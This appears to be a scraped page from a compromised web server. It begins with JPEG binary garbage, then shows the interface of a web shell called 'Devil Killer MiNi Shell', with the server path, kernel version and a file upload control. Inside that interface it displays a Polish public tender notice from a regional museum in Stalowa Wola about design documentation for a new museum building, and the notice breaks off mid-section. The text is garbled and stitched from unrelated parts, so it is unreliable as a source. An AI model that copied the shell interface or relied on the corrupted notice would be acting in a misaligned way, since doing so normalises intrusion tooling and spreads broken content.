JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240529/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240529/0034570101-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Opracowanie dokumentacji budowlanej projektowo-kosztorysowej modernizacji i zmiany układu funkcjonalnego kamienicy tzw. Górki - na potrzeby utworzenia Muzeum Kierownictwa Dywersji Armii Krajowej </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Muzeum Regionalne w Stalowej Woli</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 83041400600000</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Sandomierska 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Stalowa Wola</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">37-450</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL824 - Tarnobrzeski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">158448556</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">158448557</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">oferty@muzeum.stalowawola.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.muzeum.stalowawola.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - państwowe i samorządowe instytucje kultury</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Opracowanie dokumentacji budowlanej projektowo-kosztorysowej modernizacji i zmiany układu funkcjonalnego kamienicy tzw. Górki - na potrzeby utworzenia Muzeum Kierownictwa Dywersji Armii Krajowej </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d4777774-1382-11ef-9381-e6cc5d6d04e5</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00345701</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-05-29</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00576730/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Opracowanie dokumentacji budowlanej projektowo-kosztorysowej modernizacji i zmiany układu funkcjonalnego kamienicy tzw. Górki - na potrzeby utworzenia Muzeum Kierownictwa Dywersji Armii Krajowej</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-d4777774-1382-11ef-9381-e6cc5d6d04e5 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu platformy e-zamówienia, która jest dostępna pod adresem: https://ezamowienia.gov.pl <br/>2. Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/>3. Zamawiający wyznacza następujące osoby do kontaktu z wykonawcami: Pan Marcin Młynarski (w sprawach proceduralnych), Pan Paweł Szegda (w sprawach dot. przedmiotu zamówienia). <br/>4. Identyfikator (ID) postępowania na Platformie e-Zamówienia:<br/>ocds-148610-d4777774-1382-11ef-9381-e6cc5d6d04e5<br/>5. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”. <br/>6. Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia ani logowania. <br/>7. Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych. Dokumenty elektroniczne, o których mowa w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych, których wykaz dla przedmiotowego postępowania jest podany w SWZ, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, z uwzględnieniem rodzaju przekazywanych danych i przekazuje się jako załączniki do formularzy komunikacyjnych.<br/>8. Komunikacja w postępowaniu, z wyłączeniem składania ofert, odbywa się drogą elektroniczną za pośrednictwem dedykowanych formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”).<br/>W przypadku załączników, które zgodnie z ustawą Pzp lub rozporządzeniem Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych są opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, mogą być one opatrzone podpisem zewnętrznym lub wewnętrznym (otaczającym). <br/>9. Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy” na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do komunikacji” służących tylko do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta uproszczonego na Platformie e-Zamówienia. <br/>10. Wszystkie wysłane i odebrane w postępowaniu przez wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie postępowania w zakładce „Komunikacja”. <br/>11. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy plików przesyłanych jako załączniki do jednego formularza). <br/>12. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia. Zaleca się stosowanie aktualnie wspieranych wersji oprogramowania.<br/>13. W uzasadnionych przypadkach, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na ściśle określony adres poczty elektronicznej e-mail: oferty@muzeum.stalowawola.pl (nie dotyczy składania ofert).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>1)	Administratorem Pani / Pana danych osobowych w Muzeum Regionalnym w Stalowej Woli jest P. Krystian Koterbicki, z którym można się skontaktować poprzez e-mail: iod@carit.com<br/>2)	Pani / Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego pn.: Opracowanie dokumentacji budowlanej projektowo-kosztorysowej modernizacji i zmiany układu funkcjonalnego kamienicy tzw. Górki - na potrzeby utworzenia Muzeum Kierownictwa Dywersji Armii Krajowej Nr sprawy: MR-AG-3121-2/24.<br/>3)	Odbiorcami Pani / Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy Pzp.<br/>4)	Pani / Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy.<br/>5)	Obowiązek podania przez Panią / Pana danych osobowych bezpośrednio Pani/ Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego, konsekwencje niepodania określonych danych wynikają z ustawy Pzp.<br/>6)	W odniesieniu do Pani / Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO.<br/>7)	Posiada Pani / Pan:<br/>a)	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani / Pana dotyczących,<br/>b)	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników),<br/>c)	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego),<br/>d)	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani / Pan, że przetwarzanie danych osobowych Pani / Pana dotyczących narusza przepisy RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie przysługuje Pani / Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych,<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">MR-AG-3121-2/24</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest: 1) Wykonanie dokumentacji budowlanej projektowo-kosztorysowej modernizacji i zmiany układu funkcjonalnego kamienicy tzw. Górki - na potrzeby utworzenia Muzeum Kierownictwa Dywersji Armii Krajowej, wraz ze specyfikacjami technicznymi wykonania i odbioru robót budowlanych oraz uzyskaniem wszelkich niezbędnych pozwoleń formalno-prawnych (w tym: pozwolenie na budowę, uzyskanie zgody konserwatora zabytków, itp.). 2) Zapewnienie sprawdzenia projektu architektoniczno-budowlanego oraz technicznego pod względem zgodności z przepisami, w tym techniczno-budowlanymi, przez osobę posiadającą właściwe uprawnienia budowlane do projektowania bez ograniczeń w odpowiedniej specjalności. 3) Przygotowanie wniosku o wydanie decyzji, o której mowa w pkt. 2 powyżej (Zamawiający przewiduje udzielenia przedstawicielowi jednostki projektowej stosownego pełnomocnictwa do występowania przed organami administracji architektoniczno-budowlanej). 4) Sprawowanie nadzoru autorskiego 5) Dokumentację należy opracować na podstawie posiadanej przez Inwestora koncepcji rewaloryzacji kamienicy w Stalowej Woli przy ul. Bełżyńskiego 18. <br/><br/>Cel wykonania dokumentacji projektowej i technicznej: 1) Dokumentacja projektowa będzie podstawą do uzyskania wszelkich wymaganych uzgodnień, opinii i pozwoleń niezbędnych do uzyskania stosownej decyzji administracyjnej koniecznej dla zrealizowania zadania inwestycyjnego oraz dokonania zgłoszenia rozpoczęcia i zakończenia robót. 2) Dokumentacja techniczna obejmować będzie wykonanie kompletnego projektu budowlanego, tj. projektu zagospodarowania działki lub terenu, projektu architektoniczno-budowlanego i projektu technicznego (jeśli taki będzie wymagany), zgodnie z Rozporządzeniem Ministra Rozwoju z dnia 11 września 2020 r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. z 2022 r. poz. 1679) z uwzględnieniem art. 34 ust. 3 ustawy Prawo budowlane (Dz. U. 2021 poz. 2351 ze zm.), niezbędnego do uzyskania stosownej decyzji administracyjnej oraz opracowanie na podstawie zatwierdzonego projektu budowlanego dokumentacji wykonawczej. 3) Na podstawie przedłożonego i zatwierdzonego (zaakceptowanego) przez Zamawiającego projektu budowlanego, Wykonawca opracuje przedmiar robót, kosztorys inwestorski opracowany metodą szczegółową, specyfikacje techniczne wykonania i odbioru robót oraz pozyska stosowne opinie techniczne, ekspertyzy, badań itp., jeśli takie będą wymagane. 4) Dokumentacja techniczna służyć będzie jako opis przedmiotu zamówienia w przetargu na roboty konserwatorskie i budowlane oraz będzie podstawą do realizacji robót. 5) Zakres robót konserwatorskich zostanie zaprojektowany w sposób zapewniający spełnienie podstawowych wymagań dotyczących bezpieczeństwa konstrukcji, bezpieczeństwa pożarowego, bezpieczeństwa użytkowania. <br/><br/>Dokumentacja projektowa musi zawierać: a) projekt architektoniczny, b) projekt konstrukcyjny, c) projekt wnętrzarski (za wyjątkiem pomieszczeń przeznaczonych na ekspozycje stałe i czasowe) d) projekt aranżacji i zagospodarowania terenu dla całego obszaru objętego opracowaniem, e) projekt instalacji wodno-kanalizacyjnych, f) projekty instalacji elektrycznych, niskoprądowych, g) projekt instalacji centralnego ogrzewania wraz z kotłownią, h) projekt instalacji wentylacji mechanicznej, klimatyzacji, i) projekty dróg i parkingów, oświetlenia, ogrodzenia terenu, zieleni, odprowadzenia wód opadowych, j) projekt niezbędnych przyłączy k) projekt przebudowy (przełożenia) ewentualnych kolizji istniejącego uzbrojenia podziemnego i nadziemnego z projektowaną infrastrukturą, l) informację BIOZ. m) Wykaz wyposażenia wnętrz wraz z szczegółowym kosztorysem (lista, karty katalogowe, opisy) z za wyjątkiem pomieszczeń przeznaczonych na ekspozycje stałe i czasowe), n) dobór wyposażenia wnętrz: mebli wolnostojących i wbudowanych wykonywanych na zamówienie<br/><br/>Wykonawca wykona i przekaże Zamawiającemu: <br/>a) Projekt budowlany w 4 egz. w formie papierowej +2 egz. na nośniku elektronicznym w formacie PDF oraz skany dokumentacji z podpisami autorów oraz w formacie umożliwiającym edycję do celów projektowych (np. DOC, DWG, DXF);<br/>b) Projekt wykonawczy w 4 egz. w formie papierowej +2 egz. na nośniku elektronicznym w formacie PDF oraz skany dokumentacji z podpisami autorów oraz w formacie umożliwiającym edycję do celów projektowych (np. DOC, DWG, DXF);<br/>c) Przedmiar robót w 2 egz.(dla każdej z branż) w wersji papierowej +1 egz. na nośniku elektronicznym w formacie np. PDF, oraz w formacie: ZUZ, ATH lub KST);<br/>d) Kosztorys inwestorski w 2 egz. w wersji papierowej +2 egz. na nośniku elektronicznym w formacie PDF oraz w formacie umożliwiającym edycję (ZUZ, ATH lub KST) oraz jednorazowa bezpłatna aktualizacja;<br/>e) Specyfikacje techniczne wykonania i odbioru robót budowlanych (dla wszystkich branż) w 4 egz. w wersji papierowej +2 egz. na nośniku elektronicznym w formacie PDF oraz w formacie umożliwiającym edycję (np. DOC);<br/>f) Wykonawca łącznie z dokumentacją przekaże Zamawiającemu prawa autorskie majątkowe do dokumentacji projektowej bez dodatkowego wynagrodzenia. Wykonawca zgadza się na wykonanie przez Zamawiającego autorskich praw zależnych;<br/><br/>Obowiązki w zakresie Nadzór autorskiego: 1) Z chwilą przystąpienia Zamawiającego do robót budowlanych na podstawie dokumentacji objętej przedmiotem zamówienia, Wykonawca zobowiązany będzie do: a) prowadzenia, w ramach wynagrodzenia umownego, nadzoru autorskiego we wszystkich branżach, polegającego na kontroli, w toku realizacji robót, zgodności rozwiązań technicznych, materiałowych i użytkowych z dokumentacją projektową; b) uzupełniania szczegółów dokumentacji projektowej oraz wyjaśniania wykonawcy robót budowlanych wątpliwości powstałych w trakcie realizacji tych robót; c) udziału na wezwanie Zamawiającego, w komisjach i naradach technicznych; d) udziału na wezwanie Zamawiającego, w odbiorach poszczególnych etapów robót i odbiorze końcowym inwestycji; e) wykonywania czynności wynikających z art. 21 Prawa budowlanego, tj.:- obecności na terenie budowy i dokonywania wpisów w dzienniku budowy dotyczących jej realizacji;- żądania wpisem do dziennika budowy, wstrzymania robót budowlanych w razie stwierdzenia możliwości powstania zagrożenia lub wykonywania ich niezgodnie z dokumentacją projektową. 2) W związku z pełnieniem nadzoru autorskiego Wykonawca zobowiązany będzie do przeprowadzenia minimum 3 wizyt na terenie wykonywania budowy w trakcie realizacji robót. 3) Zamawiający uznaje, że nadzór autorski obejmuje także czynności i prace niezbędne do wykonania poza terenem budowy, np. w biurze projektowym lub siedzibie wykonawcy robót budowlanych oraz udział w naradach, odbiorach i ewentualne odpowiedzi na pytania Wykonawcy składane drogą mailową czy też telefonicznie 4) Za jednorazowy pobyt uważa się pobyt na budowie Projektanta (lub zespołu Projektantów w jednym dniu), jeżeli wynika to z potrzeb realizacji inwestycji (jednorazowy pobyt obejmuje: przygotowanie materiału do pełnienia nadzoru, pobyt, wykonanie koniecznych opracowań związanych z pobytem). 5) Projektant nie może, bez zgody Zamawiającego, odstąpić od wykonywania nadzoru autorskiego.<br/><br/>Wymagania projektowe:<br/>a) Dokumentacja projektowa powinna zawierać optymalne rozwiązania funkcjonalno-użytkowe, konstrukcyjne, materiałowe i kosztowe oraz wszystkie niezbędne rysunki zestawień, szczegółów i detali wraz z dokładnym opisem i podaniem wszystkich niezbędnych parametrów pozwalających na identyfikację materiału lub urządzenia. <br/>b) Projektowane rozwiązania powinny być zgodne ze szczegółowymi zasadami równości szans i niedyskryminacji, w tym dostępności dla osób z niepełnosprawnościami.<br/>c) Dokumentacja projektowa stanowiąca przedmiot zamówienia musi być kompletna z punktu widzenia celu, któremu ma służyć, tj. musi być opracowana należycie, gwarantować należytą wycenę i realizację robót budowlano-montażowych.<br/>d) Dokumentacja projektowa stanowiąca przedmiot zamówienia musi być uzgodniona w zakresie zabezpieczeń technicznych służących ochronie obiektów zabytkowych w Narodowym Instytucie Muzealnictwa i Ochrony Zbiorów z uzyskaniem pozytywnej opinii z zakresu instalacji bezpieczeństwa takich jak: sygnalizacji pożarowej; sygnalizacji włamania i napadu; kontroli dostępu; telewizji dozorowej.<br/>e) Zamawiający wymaga dokonania sprawdzenia dokumentacji projektowej przez osobę posiadającą wymagane uprawnienia. Każdy egzemplarz dokumentacji projektowej musi być podpisany przez projektanta i sprawdzającego. <br/>f) Wszelkie zastosowane materiały powinny posiadać odpowiednie certyfikaty i dopuszczenia do stosowania w budownictwie. Do wykończenia wnętrz nie należy projektować użycia materiałów łatwo zapalnych, których produkty rozkładu termicznego są toksyczne lub intensywnie dymiące. Na drogach komunikacji ogólnej, służących celom ewakuacji i pozostałych pomieszczeniach należy zaprojektować materiały i wykładziny co najmniej trudno zapalne. <br/>g) Wszelkie prace projektowe lub czynności nie opisane w niniejszym rozdziale, a niezbędne do właściwego i kompletnego opracowania dokumentacji projektowej, uzyskania niezbędnych uzgodnień oraz decyzji należy traktować jako oczywiste i uwzględnić w kosztach i terminach wykonania przedmiotu zamówienia.<br/>h) Wykonawca przedmiotu zamówienia zobowiązany jest do przedstawiania na bieżąco i uzgadniania z Zamawiającym proponowanych rozwiązań projektowych.<br/>i) Zaleca się, aby Wykonawca dokonał wizji lokalnej w miejscu opisanym w przedmiocie zamówienia oraz uzyskał na swoją odpowiedzialność i ryzyko wszelkie istotne informacje, które mogą być konieczne do przygotowania oferty. Wizja lokalna zostanie dokonana na koszt własny Wykonawcy. Wizja lokalna nie jest obowiązkowa choć rekomendowana, z uwagi na pogarszający się stan budynku. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71223000-7 - Usługi architektoniczne w zakresie rozbudowy obiektów budowlanych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71220000-6 - Usługi projektowania architektonicznego</p> <p class="mb-0">71222000-0 - Usługi architektoniczne w zakresie przestrzeni</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <p class="mb-0">79932000-6 - Usługi projektowania wnętrz</p> <h3 class="mb-0">4.2.8.) 